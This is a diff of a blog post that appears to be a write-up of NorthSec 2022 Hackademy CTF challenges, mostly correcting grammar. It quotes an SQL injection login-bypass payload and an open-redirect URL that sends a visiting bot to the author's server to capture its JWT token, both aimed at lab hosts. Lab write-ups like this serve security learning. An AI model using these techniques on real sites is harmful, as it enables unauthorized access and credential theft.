lolkatz/github-pages-with-jekyll/_posts/2022-05-28-northsec-hackademy.md

 +-----------------------------------------------------------------------------------------------------------------------------+
 ...
 ````
+Revealing the flag in the table fl4G_1s_H3re.
 The next challenge was an authentication bypass (well I already had the password of user admin but yeah).
 Here is the payload I used:
 ````
 ' UNION SELECT '', '', '' --
 ````
-It works because the query return one (empty) row.
+It works because the query returns one (empty) row.

 ## Open redirect 101

 Open redirect is that even a vulnerability?
-I browse the site and there was two links:
+I browsed the site and there was two links:

 ![Open redirect 101](/will-hack-for-coffee/assets/images/nsec2022/open-redirect101.png)

-Navigating the first link and looking at Burp I saw that there was a redirect containing a jwt token:
+Navigating the first link and looking at Burp I saw that there was a redirect containing a Jason Web Token token:

 ![JWT redirect](/will-hack-for-coffee/assets/images/nsec2022/jwt-redirect.png)

-You can use [jwt.io](jwt.io) to checkout what's inside the token and confirm it's a jwt but everytime I see the string "eyJ" I suspect a JWT.
+You can use [jwt.io](jwt.io) to checkout what's inside the token and confirm it's a JWT but everytime I see the string "eyJ" I suspect a JWT.

-I found this challenge interesting, it was the first time I saw a redirection used to steal credentials.
-Next link you can provide an URL and your "Grand master pentester" will visit it.
+I found this challenge interesting, it was the first time I saw simple redirection used to steal credentials.
+Next link allows you to provide an URL and the "Grand master pentester" will visit it.
 Our team own a small server on the nsec network so I redirected him there:
 http://chal5.hackademy.ctf/?sub_url=http://shell.ctf
 Looking at our server log:
 ````